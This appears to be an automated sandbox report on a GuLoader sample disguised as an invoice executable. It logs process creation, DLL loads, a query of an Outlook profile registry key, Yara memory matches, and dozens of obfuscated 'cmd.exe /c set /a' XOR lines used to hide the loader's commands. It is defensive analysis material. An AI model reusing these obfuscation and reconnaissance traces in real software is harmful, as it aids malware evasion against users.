Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Users\user\Desktop\Revised PI_2024.exe "C:\Users\user\Desktop\Revised PI_2024.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Revised PI_2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.82257067560.000000000511A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.82255738297.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.82255738297.0000000000514000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Revised PI_2024.exe PID: 5984, type: MEMORYSTR

Obfuscated command line found

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"	Jump to behavior
